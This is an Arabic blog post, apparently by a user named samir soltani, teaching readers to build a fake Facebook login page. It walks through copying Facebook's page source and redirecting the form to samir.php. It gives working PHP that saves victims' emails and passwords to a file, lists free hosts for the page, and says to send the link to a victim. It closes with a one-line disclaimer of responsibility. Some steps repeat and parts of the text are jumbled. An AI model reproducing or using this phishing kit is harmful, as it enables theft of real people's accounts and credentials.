: لأي موقع لا بد لك من توفر ثلاث ملفات مشتركة "Phishing" لصنع صفحة
: وهي
(الصفحة الوهمية) HTML ملف
(لتتبع التفاصيل داخل الصفحة التي أنشأتها) PHP ملف
(لحفظ جميع المعلومات في شكل نص) Txt ملف
توجّه إلى الصفحة الرئيسية للفيسبوك
ثم اضغط في أي مكان بزر الماوس الأيمن ومن القائمة التي تظهر اختر
"view page source"
(تأكد من تمام عملية تحميل الصفحة كاملة) "login page"
لإختيار جميع الصفحة ثم قم بعمليتي نسخ ولصقمن لوحة المفاتيح اضغط على
المفتاحين ( CTRL + A )
لجميع أكواد هذه الصفحة على الnotepad
اضغط على المفتاحين (CTRL + F) للبحث عن الكلمة ي "action" وسوف تعثر على الكود التالي
action="https://www.facebook.com/login.php?login_attempt=1"
استبدل الكود المبين أعلاه بالكود التالي
action="samir.php"
بعدما استبدلته إلى samir.php
اضغط على المفناح
(CTRL + S)
لحفظ هذا الملف بامتداد
!!وبانتهائنا من هذه الخطوات تكون صفحتنا الوهمية جاهزة
الآن نأتي إلى انشاء الملف الثاني وهو ملف PHP
notepad
notepad
وببساطة لإنشاء هذا الملف قم بنسخ كود الPHP التالي ثم الصقه على محرر ال notepad
احفظه بالإمتداد الذي اخترته سابقا samir.php
هو الرابط الذي يقوم بتوجيه الضحية بمجرّد ادخال معلومتي تسجيل الدخول‘http://www.facebook.com‘
الإيميل والباسوورد) ثم الضغط على"connection"
<?php
$fp = fopen("Passwords.htm", "a");
fwrite($fp, "Email:$_POST[email]\tPassword:$_POST[pass]");
echo "<HTML>
<head>
<FRAMESET cols=\"*\">
<FRAME SRC=\"http://www.facebook.com\">
</FRAMESET>";
?>
وهذه صورة للكود php
//*//*/*/*/*/*/*/*/*/**/*/***********************///////*/*/*/*/*/*/*/*/*//*/*/
الإيميل والباسوورد) ثم الضغط على"connection"
وبتمام هذه الخطوة نكون قد اتممنا انشاء ملفPHP
الآن سجّل في احدى المواقع ذات الإستضافات المجانية
: مثلا
my3gb.com
t35.com
110mb.com
أو
ripway
أو
drivehq
.
.
الخ
بعد تسجيلك في إحدى هذه المواقع المجانية قم باضافة الملفين التاليين إلى الموقع
facebook.html
samir.php
تأكد من أن هذان الملفان في نفس المجلّد
بعد استضافة هاذان الملفان في الموقع المجاني سوف تحصل على رابط مباشر للصفحة الوهمية التي أنشأتهاسابقا
الآن سجّل في احدى المواقع ذات الإستضافات المجانية
: مثلا
my3gb.com
t35.com
110mb.com
أو
ripway
أو
drivehq
.
.
الخ
بعد تسجيلك في إحدى هذه المواقع المجانية قم باضافة الملفين التاليين إلى الموقع
facebook.html
samir.php
تأكد من أن هذان الملفان في نفس المجلّد
بعد استضافة هاذان الملفان في الموقع المجاني سوف تحصل على رابط مباشر للصفحة الوهمية التي أنشأتهاسابقا
. (facebook.html
استخدم هذا اللينك أو الرابط لإرساله إلى الضحية. وبمجرّد ما يدخل الإيميل والباسوورد الخاصة بحسابه
سوف تظهر صفحة جديدة آليا على نفس المجلّد تحمل اسم"connection" على الصفحة الوهمية ويضغط على
. تحتوي على كلا من اسم المستخدم وباسوورد الضحية (password.html)
انا غير مسؤول
0 commentaires:
إرسال تعليق
لا تنسى ان تشارك samir soltani بتعليقك
او نشر الموظوع جزاك الله خيرا